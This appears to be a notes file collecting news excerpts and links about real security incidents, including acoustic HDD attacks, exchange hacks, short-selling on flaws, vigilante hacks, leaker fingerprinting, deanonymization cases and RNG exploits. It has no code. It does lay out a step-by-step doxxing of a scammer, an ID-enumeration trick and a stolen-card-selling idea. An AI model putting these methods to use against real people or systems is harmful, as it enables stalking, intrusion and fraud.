The attacks use sonic and ultrasonic sounds to disrupt magnetic HDDs as they read or write data. The researchers showed how the technique could stop some video-surveillance systems from recording live streams. Just 12 seconds of specially designed acoustic interference was all it took to cause video loss in a 720p system made by Ezviz. Sounds that lasted for 105 seconds or more caused the stock Western Digital 3.5 HDD in the device to stop recording altogether until it was rebooted.

- article
- schneier blog
- paper

Payoff

http://www.integrity-research.com/jury-convicts-in-big-data-insider-trading-trial/

Cryptocurrency private keys for hot wallets

Coincheck $500 million hack

According to the exchange’s representatives, the hackers have managed to steal the private key for the hot wallet where NEM coins were stored, enabling them to drain the funds. 
- Article

Gatecoin $2 million hack

Most clients’ asset funds are stored in multi-signature, cold wallets. However, the attacker managed to alter the system so that BTC and ETH deposit transfers bypassed the multi-signature cold storage and entered the hot wallet during the breach. The loss of ETH funds exceeded the 5% limit Gatecoin placed on its hot wallets.
- Article

https://www.reddit.com/r/eos/comments/9fxyd4/eosbet_transfer_hack_statement/

Hacking to game the stock market

St Jude's

St Jude's Medical Inc.'s pacemakers and defibrillators had a vulnerability that was discovered by researchers working for a legit company. They email an investment firm with an offer to make money.

The researchers would provide information proving the medical devices could be hacked in a way that was life-threatening, and the investor would take a short position against St Jude. The hacker's fee for the information would be 10% of the profits as the shares fall. If the shares go up, the hackers will pay 20% of the lost money.

Researchers want to impose significant monetary penalties on companies it believes are negligent when it comes to protecting consumers. (Rather than typical bug bounty). Don't believe hackers will exploit it, as it took their team months to find the exploits and they will withhold key details from the public. 
- Article
Medical device maker St Jude has filed suit against a security startup that shorted its stock and publicized alleged flaws in its products for profit.

Pacemaker supplier St Jude has sued both MedSec and investment research biz Muddy Waters in Minnesota, America, as well as three other individuals it says falsely reported serious vulnerabilities in its pacemakers and defibrillators.

The allegations [PDF] include false advertising, false statements, conspiracy, and market manipulation.

- Article

AMD

Last week, the Israeli security company CTS-Labs published a series of exploits against AMD chips. The publication came with the flashy website, detailed whitepaper, cool vulnerability names -- RYZENFALL, MASTERKEY, FALLOUT, and CHIMERA -- and logos we've come to expect from these sorts of things. What's new is that the company only gave AMD a day's notice, which breaks with every norm about responsible disclosure. 

But CTS's website touting AMD's flaws also contained a disclaimer that threw some shadows on the company's motives: "Although we have a good faith belief in our analysis and believe it to be objective and unbiased, you are advised that we may have, either directly or indirectly, an economic interest in the performance of the securities of the companies whose products are the subject of our reports," reads one line. WIRED asked in a follow-up email to CTS whether the company holds any financial positions designed to profit from the release of its AMD research specifically. CTS didn't respond.

- Scheier Blog Post
- Article

Equifax

Before Equifax revealed its massive data breach last year, four of its executives sold their shares. Four days after news of the breach hit the press, the stock had plunged 18.4%. (One of those executives, Jun Ying, was charged on Wednesday for insider trading.)
- Article

Revenge/Vigilantes

Ransomware a Tech Support Scammer

Tech support scammers mess with hacker's mother, so he retaliated with ransomware. He faked falling for the scam, and then sent the scammer a fake photo of credit card in a zip file, which when unzipped really triggered ransomware. 
- Article

CEO wire transfer scammers open poisoned PDF invoices

Hacker takes down CEO wire transfer scammers, sends their Win 10 creds to the cops. 'Whaling' attackers fall for poison PDF 'invoices'.
- Article

Hacker wipes spyware servers multiple times

Thursday, the hacker said he started wiping some cloud servers that belong to Retina-X Studios, a Florida-based company that sells spyware products targeted at parents and employers, but that are also used by people to spy on their partners without their consent.

Retina-X was one of two companies that were breached last year in a series of hacks that exposed the fact that many otherwise ordinary people surreptitiously install spyware on their partners’ and children’s phones in order to spy on them. This software has been called “stalkerware” by some. 

...The private data was stored in containers provided by cloud provider Rackspace. The hacker found the key and credentials to those containers inside the Android app of PhoneSheriff, one of Retina-X’s spyware products. The API key and the credentials were stored in plaintext, meaning the hacker could take them and gain access to the server.

This time, the hacker said the API key was obfuscated, but it was still relatively easy for him to obtain it and break in again. Because he feared another hacker getting in and then posting the private photos online, the hacker decided to wipe the containers again.

- Article

Ransomware

Spread Popcorn Time Ransomware, get chance of free Decryption Key

Yesterday a new in-development ransomware was discovered by MalwareHunterTeam called Popcorn Time that intends to give victim's a very unusual, and criminal, way of getting a free decryption key for their files.  With Popcorn Time, not only can a victim pay a ransom to get their files back, but they can also try to infect two other people and have them pay the ransom in order to get a free key.
- Article

Selling Data

Sell credit card data obtained, OR create a fake site pretending to be one of the popular stolen credit card marketplaces.
- Article

OpSec Violations

Fingerprinting Documents to track leakers / inside threats

Unicode homoglyph substitution [Conference Paper on Unicode Homoglyph Substitution] [Web App for Unicode Homoglyph Substitution]

Zero-width characters [Blog Post]

Article on all methods [Good general article]

Intentional mispelling (used in congress) [Blog Post]

How a few yellow dots burned the Intercept’s NSA leaker Article

Guide on how printers use yellow dots https://veteransec.com/2018/10/18/vetsec-takes-first-in-the-hacktober-ctf-summary-steganography-write-up/

Fonts leak date information

How a Microsoft font brought down Pakistani Prime Minister Nawaz Sharif
Friday's ouster of Pakistani Prime Minister Nawaz Sharif wasn't just a momentous event in the Asian country but also big news for fans of typography.

A key part of the corruption case that led to Mr. Sharif's removal from power hinged on the typeface used in a financial document.

The controversy was therefore dubbed Fontgate and on Friday, headline writers and wags on Twitter were saying that Pakistan was now "Sans Sharif."

It all hinged on a document that the Sharif family had produced in an attempt to distance the prime minister from questions about who owned four properties in an upscale part of London.

The document was purported to be written in February 2006 but court-appointed investigators concluded that it was forged, noting that it used the Calibri font, a Microsoft licensed typeface that was not commercially available at the time.
- [Article https://www.theglobeandmail.com/news/world/how-a-microsoft-font-brought-down-pakistani-prime-minister-nawaz-sharif/article35828938/]
The scandal wasn't near as big, but a similar issue arose during the 2004 US Presidential election. Documents claiming to be from the early 1970s about George W Bush's air national guard service were found to use things like proportional-width fonts - and, indeed, the entire document seems to have just been typed using the default settings for a contemporary version of Word.
- [Article https://en.wikipedia.org/wiki/Killian_documents_controversy]

Marcus Hutchins [Sept 2017]

Flipertyjopkins uploads video to Youtube 8 years ago instructing viewers how to use Hotmail cracker v1.3. Investigative Journalist Brian Krebs notes that at 2:48 mark in video, an MSN Chat Window shows up that clearly shows the user is logged in as "[email protected]", thus linking Flipertyjopkins to Marcus Hutchins.

[Article]

eBay Scammer [Sept 2016]

Person had $500 Apple gift card, wanted to sell for bitcoin due to lack of chargebacks.

Several potential buyers, all wanted it for 50% or less of card's worth. Found one willing to pay 75% on reddit darkmarket.

Seller sends card numbers for buyer to verify balance + details on how to verify identity (news article about winner of competition, clicking blog post link in article takes to winner's blog, click about me page lists social usernames one of which is reddit account communication is taking place on).

Buyer says seller could have just bought that reddit account, insists on not going first, says has eBay account with high positive feedback and will prove it. Seller says you could have bought eBay account, buyer replies can't due to lockout on geo/ip changes. Buyer sends seller message to prove his owning of account with high rep.

Seller sends pins for cards + bitcoin address for payment + pictures of card hosted on his site + tracking number for mailed cards.

Buyer deletes his reddit account to stop communication. Seller messages him on eBay, buyer on eBay claims his account was hacked and it wasn't him.

Seller decides to track buyer/scammer down. From the scammer's eBay account, the seller had a username + city location. From the scammer's reddit account, the seller had a username.

A google search for the scammer's reddit and eBay usernames uncovered a Steam account which used both names, confirming it was not a hacked eBay account but the same person who went by two nicknames. The google search also uncovered a profile on a looking-for-job website which contained the scammer's first name, first letter of last name, and city location (which matched the one on eBay).

Seller had sent buyer an image of the cards. Scammer had opened it, which gave the seller the scammer's IP address and city (which again matched the one on eBay).

Seller now did a Facebook search for scammer's ebay username. In the text post of a random gamer, seller sees the message "Good games last night on LoL <scammer_ebay_username>". Unfortunately link to profile wasn't link, only text due to privacy settings of linked user.

Seller looked at this random gamer's profile, scrolled through 4 years of posts, and found a screenshot that random gamer posted that had the scoreboard from LoL (League of Legends) in the foreground AND facebook chat open in the background, with the scammer's full name visible (matching the first name plus first letter of last name seller got from the job website). So from this, seller discovered scammer's full first and last name.

Seller now did a Facebook search of scammer's last name and city, and found the scammer's mother. He sent the scammer's mother a Facebook message.

[Article]

vDos [Sept 2016]

Investigator was analyzing random ddos-for-hire site PoodleStresser. He found a vulnerability, which allowed downloading config data on the site. This data showed PoodleStresser connects to api of ddos-for-hire site vDOS to power their attacks (so PoodleStresser is just a reseller of vDOS).

vDos is a much larger site of the same ilk, hidden behind cloudflare (so the site's true IP is not known). Using the downloaded config data from PoodleStresser gave the investigator api access to vDos. The investigator found a serious vulnerability in the api of vDos that allowed dumping vDos' database and config files, as well as obtaining the true IP address of vDos (which pointed to four rented servers in Bulgaria at Verdina.net).

From the vDos dumped database, all tech support tickets were extracted. From these support tickets, it was discovered that all attacks vDos clients attempted to make against Israel failed (suggesting owners were in Israel trying to avoid attention of Israeli authorities). Additionally, the vDos owners' online nicknames were found in the support tickets as P1st0 and AppleJ4ck.

From the vDos extracted config files, it was discovered that the site was configured to blast text messages to 6 phone numbers (two of which are Israeli) whenever support ticket of high level created via SMS service online called Nexmo.com. Of the two Israeli phone numbers, one was tracked via Whitepages online to an Israeli named Yarden Bidani, while the other was connected via WhoIs records to the domain v-email.org under the name Itay Huri. It was also discovered that the site was configured to send support emails to [email protected], [email protected] and [email protected]

A reverse IP lookup found several other sites running on the same IP as vDos. A whoIS lookup on these domains found one of them registered to a phone number matching one of the phone numbers vDos' config files blasted out text messages to.

A google search for the owner's aliases (that were discovered in the tech support tickets) found listings they made on places like hackforums.net, peddling warez and services.

[Article]

KickAss Torrents [July 2016]

The feds track the owner of KAT through a variety of methods, though mostly through accessing bank and server records.

Possible angle: Client had a website example.com, which Feds saw pointed to IP Address 5.5.5.5. A reverse DNS lookup on 5.5.5.5 showed several other domains hosted at the same IP address (many of which just proxied the main site). One of those other domains was old, and the whois record for it was not privacy protected and thus leaked the true owner's name, address, phone, and email. The email from this domain was used for an Apple account that purchased something on iTunes using a specific IP address (that wasn't hidden behind a proxy). Same IP address was person managing Facebook page for KAT. Coinbase account to collect bitcoin donations also tied to same email address, and bitcoin address behind Coinbase account was on KAT website for donations.

[Article 1, Article 2, Article 3]

Burger King Foot Lettuce Guy

Burger King Foot Lettuce guy doxxed from photo meta-data

Fitness Tracking App Gives Away Military Base Locations

Data firms often aggregate and 'anonymize' data for presentation in compelling visuals or charts. How anonymized is the data if there are a handful of fitness users running around a track of an abandoned air force base in Somalia? Aggregation is not anonymization.

Locating Secret Military Bases via Fitness Data TheGuardian Article Tweet: Somalia Air Force Base

https://mango.pdf.zone/operation-luigi-how-i-hacked-my-friend-without-her-noticing

HTC

race conditions

Hacking Starbucks
https://sakurity.com/blog/2015/05/21/starbucks.html
Keybase exceed invite limit
https://hackerone.com/reports/115007

Blacknova Traders

https://packetstormsecurity.com/files/120231/BlackNova-Traders-SQL-Injection.html https://github.com/emeth-/BlacknovaTraders/blob/master/news.php#L42-L55


Account Enumeration

Something like login as bob with ID 12345, must admin's social security number. Trick is admin is userid 1. no protection, can edit url to pull up his data.
https://hackerone.com/reports/98247
https://www.wired.com/2010/06/ipad-exposed/


https://krebsonsecurity.com/2018/09/govpaynow-com-leaks-14m-records/


DOD: Turn Off Your Fitbit, Garmin, Apple Watch GPS NOW! https://breakingdefense.com/2018/08/turn-off-your-fitbit-garmin-apple-watch-gps-now/

Homebrew leaked github api key in public jenkins: https://medium.com/@vesirin/how-i-gained-commit-access-to-homebrew-in-30-minutes-2ae314df03ab


Mobile App Rackspace credentials embedded within app

Thursday, the hacker said he started wiping some cloud servers that belong to Retina-X Studios, a Florida-based company that sells spyware products targeted at parents and employers, but that are also used by people to spy on their partners without their consent.

Retina-X was one of two companies that were breached last year in a series of hacks that exposed the fact that many otherwise ordinary people surreptitiously install spyware on their partners’ and children’s phones in order to spy on them. This software has been called “stalkerware” by some. 

...The private data was stored in containers provided by cloud provider Rackspace. The hacker found the key and credentials to those containers inside the Android app of PhoneSheriff, one of Retina-X’s spyware products. The API key and the credentials were stored in plaintext, meaning the hacker could take them and gain access to the server.

This time, the hacker said the API key was obfuscated, but it was still relatively easy for him to obtain it and break in again. Because he feared another hacker getting in and then posting the private photos online, the hacker decided to wipe the containers again.

- Article

RNG

Slot Machine RNG

Dudes used a cell phone to get several wheel examples, fed those into an algorithm which found the random seed they were operating on, received back when was best time to hit spin. https://www.wired.com/2017/02/russians-engineer-brilliant-slot-machine-cheat-casinos-no-fix/


Hacking slot machines with a buttonhole camera and brute-force search (github.com) https://news.ycombinator.com/item?id=18035283


Texas Hold 'Em online - bad shuffler

Texas Hold 'Em, card shuffling randomness. We found that the algorithm used by ASF Software, Inc., the company that produces the software used by most of the online poker games, suffered from many flaws.
 
In a real deck of cards, there are 52! (approximately 2^226) possible unique shuffles. When a computer shuffles a virtual deck of cards, it selects one of these possible combinations. There are many algorithms that can be used to shuffle a deck of cards, some of which are better than others (and some of which are just plain wrong).

The shuffling algorithm used in the ASF software always starts with an ordered deck of cards, and then generates a sequence of random numbers used to re-order the deck. Recall that in a real deck of cards, there are 52! (approximately 2^226) possible unique shuffles. Also recall that the seed for a 32-bit random number generator must be a 32-bit number, meaning that there are just over 4 billion possible seeds. Since the deck is reinitialized and the generator re-seeded before each shuffle, only 4 billion possible shuffles can result from this algorithm. Four billion possible shuffles is alarmingly less than 52!.

To make matters worse, the algorithm of Figure 1 chooses the seed for the random number generator using the Pascal function Randomize(). This particular Randomize() function chooses a seed based on the number of milliseconds since midnight. There are a mere 86,400,000 milliseconds in a day. Since this number was being used as the seed for the random number generator, the number of possible decks now reduces to 86,400,000. Eight-six million is alarmingly less than four billion. But that's not all. It gets worse.

The system clock seed gave us an idea that reduced the number of possible shuffles even further. By synchronizing our program with the system clock on the server generating the pseudo-random number, we are able to reduce the number of possible combinations down to a number on the order of 200,000 possibilities. After that move, the system is ours, since searching through this tiny set of shuffles is trivial and can be done on a PC in real time.

The RST exploit itself requires five cards from the deck to be known. Based on the five known cards, our program searches through the few hundred thousand possible shuffles and deduces which one is a perfect match. In the case of Texas Hold'em poker, this means our program takes as input the two cards that the cheating player is dealt, plus the first three community cards that are dealt face up (the flop). These five cards are known after the first of four rounds of betting and are enough for us to determine (in real time, during play) the exact shuffle. 

- Article
- Another article on it

Bridge hand generator RNG

ACBL and USBF hand generators are demonstrably insecure
- Related Issue/Article